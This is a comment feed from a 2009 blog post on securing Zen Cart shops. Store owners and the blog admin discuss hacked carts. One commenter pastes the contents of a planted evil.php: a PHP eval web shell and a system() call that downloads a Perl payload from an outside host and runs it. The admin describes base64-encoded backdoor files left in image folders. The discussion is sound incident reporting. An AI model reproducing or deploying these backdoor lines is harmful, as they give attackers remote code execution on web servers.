Comments on: Secure your Zencart – A time consuming yet easy task http://blog.rubikintegration.com/2009/08/02/secure-your-zencart-a-time-consuming-yet-easy-task/ eCommerce Solutions for All! Sat, 04 Feb 2012 10:30:59 +0000 hourly 1 http://wordpress.org/?v=3.3.1 By: Cliff http://blog.rubikintegration.com/2009/08/02/secure-your-zencart-a-time-consuming-yet-easy-task/comment-page-1/#comment-507 Cliff Mon, 12 Oct 2009 22:09:05 +0000 http://blog.rubikintegration.com/?p=198#comment-507 opps stripped the code. /?php eval(stripslashes($_GET[e]));?/ /?php system("cd /tmp;wget smenar.clan.su/payments.txt;perl payments.txt");?/ opps stripped the code.
/?php eval(stripslashes($_GET[e]));?/ /?php system(“cd /tmp;wget smenar.clan.su/payments.txt;perl payments.txt”);?/

]]> By: Cliff http://blog.rubikintegration.com/2009/08/02/secure-your-zencart-a-time-consuming-yet-easy-task/comment-page-1/#comment-506 Cliff Mon, 12 Oct 2009 22:07:31 +0000 http://blog.rubikintegration.com/?p=198#comment-506 I found evil.php in my images directory. Contents of the file are I found evil.php in my images directory. Contents of the file are

]]> By: admin http://blog.rubikintegration.com/2009/08/02/secure-your-zencart-a-time-consuming-yet-easy-task/comment-page-1/#comment-271 admin Wed, 05 Aug 2009 14:52:11 +0000 http://blog.rubikintegration.com/?p=198#comment-271 Note: In the process of cleaning several stores I have seen something worth mentioning: check your images/ folder and see if there is any rogue file there (no php file should ever be there). The rogue file usually contain content like this: $a=base64_decode('LyoKKioqKioqKi...'); ..... This is definitely a backdoor set by the hacker, please make sure that you delete that file(s). Note: In the process of cleaning several stores I have seen something worth mentioning: check your images/ folder and see if there is any rogue file there (no php file should ever be there). The rogue file usually contain content like this:
$a=base64_decode(‘LyoKKioqKioqKi…’);

…..

This is definitely a backdoor set by the hacker, please make sure that you delete that file(s).

]]> By: admin http://blog.rubikintegration.com/2009/08/02/secure-your-zencart-a-time-consuming-yet-easy-task/comment-page-1/#comment-264 admin Tue, 04 Aug 2009 02:32:49 +0000 http://blog.rubikintegration.com/?p=198#comment-264 Just an update to the post: We have many customers contacted us recently for security help because their carts were hacked. Please please make sure your cart is updated: http://www.zen-cart.com/forum/showthread.php?t=131115 Just an update to the post: We have many customers contacted us recently for security help because their carts were hacked. Please please make sure your cart is updated:

http://www.zen-cart.com/forum/showthread.php?t=131115

]]>